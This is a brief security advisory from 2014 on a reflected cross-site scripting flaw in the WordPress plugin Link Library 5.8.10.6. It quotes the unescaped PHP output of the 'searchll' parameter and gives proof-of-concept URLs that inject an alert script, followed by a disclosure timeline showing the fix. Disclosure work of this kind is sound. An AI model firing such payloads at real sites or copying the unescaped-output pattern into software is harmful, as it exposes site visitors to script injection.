08-11-2014 / Vulnerabilities

Link Library 5.8.10.6 Reflected XSS

$_GET['searchll'] is not escaped.

File: link-library\render-link-library-sc.php

if ( 'search' == $mode ) {
    $output .= '<div class="resulttitle">' . __('Search Results for', 'link-library') . ' "' . stripslashes( $_GET['searchll'] ) . '"</div>';
}

Proof of Concept

XSS will be visible on page with [link-library settings=1] tag.

http://wordpress_install/page_with_tag/?searchll=word_that_must_found_some_link <script>alert("XSS");</script>

XSS will be visible only if search function return something.

So we can use popular letter ("a" or "e") and after space put XSS. For example:

http://wordpress_install/page_with_tag/?searchll=a <script>alert("XSS");</script>

Timeline

  • 06-11-2014: Discovered
  • 06-11-2014: Vendor notified
  • 07-11-2014: Version 5.8.11 released, issue resolved